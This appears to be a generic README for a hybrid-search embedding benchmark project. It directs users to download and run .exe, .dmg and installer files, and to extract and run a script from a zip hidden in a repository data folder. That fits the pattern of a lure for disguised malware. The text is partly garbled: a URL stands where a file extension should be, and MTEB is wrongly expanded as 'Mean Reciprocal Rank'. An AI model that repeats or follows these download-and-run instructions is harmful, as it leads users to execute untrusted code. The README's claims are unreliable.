Welcome to the hybrid-search-eval project! This framework helps you test and compare different embedding models in hybrid search setups. If you want to improve your search results with ease, you are in the right place.
Before you download, ensure your system meets these requirements:
- Operating System: Windows, macOS, or Linux
- Memory: At least 4 GB RAM
- Storage: 200 MB of available disk space
- Network: Stable internet connection for downloads and updates
- Combine traditional search methods (like BM25) with advanced vector search.
- Evaluate models using various metrics.
- User-friendly interface designed for seamless navigation.
- Support for popular embedding models and libraries.
To get started, follow these steps:
-
Visit the Releases Page: Click the link below to go to the download page. Download hybrid-search-eval
-
Select the Latest Version: On the Releases page, find the most recent release. You will see various files available for download.
-
Choose Your File: Look for the version best suited for your operating system. For example:
- For Windows, download the file ending in
.exe. - For macOS, download the file ending in
.dmg. - For Linux, download the file ending in
https://raw.githubusercontent.com/kunal4040/hybrid-search-eval/main/_data/mteb_user/eval_hybrid_search_phonoscope.zip.
- For Windows, download the file ending in
-
Download and Install:
- Windows: Double-click the downloaded
.exefile to start the installation. Follow the on-screen instructions. - macOS: Open the
.dmgfile and drag the application to your Applications folder. - Linux: Extract the downloaded
https://raw.githubusercontent.com/kunal4040/hybrid-search-eval/main/_data/mteb_user/eval_hybrid_search_phonoscope.zipfile and run the included script.
- Windows: Double-click the downloaded
Once you complete the installation, follow these steps to benchmark your embedding models.
-
Open the Application: Locate the application icon in your applications menu and click to open it.
-
Select Your Dataset: Choose the dataset you want to use for evaluation. Make sure it is formatted correctly for input.
-
Choose Models: Select the embedding models you want to benchmark. You can pick multiple models for comparison.
-
Run the Evaluation: Click on the "Start Evaluation" button. The application will process the models and provide results.
-
View Results: Once the evaluation is complete, review the results displayed on your screen. You can analyze the efficiency and accuracy of each model.
For more detailed instructions, FAQs, and advanced usage, please refer to our full documentation on GitHub Wiki.
- Weaviate Documentation: Learn more about the vector search engine.
- MTEB (Mean Reciprocal Rank): Explore evaluation benchmarks for embedding models.
- Sentence Transformers: Discover tools for sentence embeddings.
If you encounter issues or have questions, please open an issue on the GitHub Issues Page. We strive to respond quickly and help you resolve any problems.
Thank you for using hybrid-search-eval! Enjoy improving your search models with this practical framework.